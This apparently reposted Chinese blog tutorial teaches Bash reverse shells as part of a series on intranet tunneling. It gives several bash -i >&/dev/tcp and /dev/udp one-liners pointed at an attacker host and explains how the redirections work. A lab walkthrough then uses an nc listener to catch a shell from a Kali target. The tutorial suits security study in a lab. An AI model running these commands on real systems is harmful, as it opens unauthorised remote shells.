内网隧道代理技术(七)之Bash反弹shell

Bash反弹shell

Bash介绍

Shell也称为终端或壳,是人与内核之间的翻译官,而Bash则是Linux中默认使用的Shell

Bash 反弹Shell的命令如下:

bash -i >&/dev/tcp/攻击机_IP/攻击机端口 0>&1
bash -i >&/dev/tcp/攻击机_IP/攻击机端口 0>&2
bash -i >&/dev/udp/攻击机_IP/攻击机端口 0>&1
bash -i >&/dev/udp/攻击机_IP/攻击机端口 0>&2

接下来,我们逐步分解,对这些参数进行详细介绍

“bash-i” 是指打开一个交互式的Shell

"&“符号用于区分文件和文件描述符,”>&“符号后面跟文件时,表示将标准输出和标准错误输出重定向至文件,”>&“符号后面跟数字时表示后面的数字是文件描述符,不加”&“符号则会把后面的数字当成文件。数字"0”,“1”,"2"是LinuxShell下的文件描述符, “0”是指标准输入重定向, “1”是指标准输出重定向, “2”是指错误输出重定向。

“/dev"目录下"tcp"和"udp"是Linux中的特殊设备,可用于建立Socket连接,读写这俩文件就相当于是在Socket连接中传输数据。”>&/dev/tcp/攻击机_ip/攻击机端口"则表示将标准输出和标准错误输出重定向到"/dev/tcp/攻击机ip/攻击机端口"文件中,也就是重定向到了攻击机,这时目标机的命令执行结果可以从攻击机看到。"0>&1"或"0>&2"又将标准输入重定向到了标准输出,而标准输出重定向到了攻击机,因此标准输入也就重定向到了攻击机,从而可以通过攻击机输入命令,并且可以看到命令执行结果输出

实验环境介绍

实验拓扑

在这里插入图片描述

机器名称 IP 机器
攻击机器 192.168.41.130 windows
服务器 192.168.41.132 kali

实验复现

攻击机器使用nc执行监听命令

#监听 TCP
nc64.exe -lvvp 9999 
#监听UDP
nc64.exe -lup 9999 

在这里插入图片描述

实验服务器执行连接命令

bash -i >&/dev/tcp/192.168.41.130/9999 0>&1

在这里插入图片描述

查看结果,发现我们成功得到目标服务器IP

在这里插入图片描述

猜你喜欢

转载自blog.csdn.net/qq_64973687/article/details/131385453